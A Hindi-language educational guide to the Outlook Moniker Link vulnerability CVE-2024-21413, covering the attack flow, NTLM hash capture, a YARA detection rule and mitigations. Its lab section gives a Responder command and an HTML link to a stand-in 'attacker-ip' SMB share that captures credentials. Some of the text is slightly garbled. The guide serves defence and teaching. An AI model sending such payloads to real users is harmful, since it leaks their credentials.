
CVE-2024-21413, Outlook ज़ीरो-क्लिक Moniker Link कमजोरी, पर शैक्षिक मार्गदर्शिका, जिसमें हमले का प्रवाह, NTLM क्रेडेंशियल कैप्चर, YARA के साथ पहचान, और शमन रणनीतियाँ शामिल हैं।
CVE-2024-21413, जिसे सामान्यतः मोनिकर लिंक भेद्यता कहा जाता है, Microsoft Outlook में एक गंभीर सुरक्षा दोष है जो हमलावरों को बिना किसी इंटरैक्शन के उपयोगकर्ता क्रेडेंशियल्स लीक करने में सक्षम बनाता है।
पारंपरिक फ़िशिंग हमलों के विपरीत, इस भेद्यता को केवल एक ईमेल का पूर्वावलोकन करके ट्रिगर किया जा सकता है, जो इसे उद्यम वातावरण में विशेष रूप से खतरनाक बनाता है।
समस्या इस बात से उत्पन्न होती है कि आउटलुक मोनिकर लिंक को कैसे प्रोसेस करता है, जिससे हमलावर-नियंत्रित सिस्टम पर अनजाने में प्रमाणीकरण प्रयास होते हैं।
निम्नलिखित अवधारणाओं को समझना आवश्यक है:
एक विंडोज़-विशिष्ट तंत्र जो एप्लिकेशन को निम्नलिखित प्रोटोकॉल का उपयोग करके बाहरी संसाधनों को संदर्भित करने की अनुमति देता है:
file://unc://\\attacker-server\share
नेटवर्क पर साझा संसाधनों तक पहुँचने के लिए उपयोग किया जाता है। इस भेद्यता में, इसका दुरुपयोग प्रमाणीकरण अनुरोधों को बलपूर्वक करने के लिए किया जाता है।
आउटलुक का संरक्षित दृश्य संभावित असुरक्षित सामग्री को अलग करने के लिए डिज़ाइन किया गया है। यह भेद्यता उस सुरक्षा को बायपास करती है, जिससे बाहरी संसाधनों तक पहुँच संभव होती है।
पेलोड तैयार करना
file://attacker-server/share) एम्बेड करता है।वितरण
ट्रिगर
स्वचालित प्रसंस्करण
प्रमाणीकरण अनुरोध
क्रेडेंशियल एक्सपोज़र
[Attacker]
|
| 1. Send crafted email
v
[Victim Outlook]
|
| 2. Auto-process moniker link
v
[Windows System]
|
| 3. NTLM authentication attempt
v
[Attacker Server]
|
| 4. Capture NTLM hash
v
[Credential Abuse / Lateral Movement]
⚠️ केवल नियंत्रित प्रयोगशाला वातावरण में ही प्रदर्शन करें
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
फ्लोरियन रोथ द्वारा मोनिकर लिंक से जुड़े शोषण प्रयासों की पहचान करने के लिए एक पहचान नियम विकसित किया गया था।
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// और UNC-आधारित लिंक को फ़िल्टर या स्वच्छ करेंCVE-2024-21413 यह प्रदर्शित करता है कि गहराई से एकीकृत सिस्टम व्यवहार (जैसे स्वचालित प्रमाणीकरण) का शोषण ईमेल लिंक जैसे प्रतीत होने वाले हानिरहित इनपुट के माध्यम से कैसे किया जा सकता है।
💡 अनुशंसा: हमला श्रृंखला और रक्षात्मक रणनीतियों को पूरी तरह से समझने के लिए इस भेद्यता को एक वर्चुअल लैब (उदाहरण के लिए, Windows VM + हमलावर VM) में पुन: उत्पन्न करें।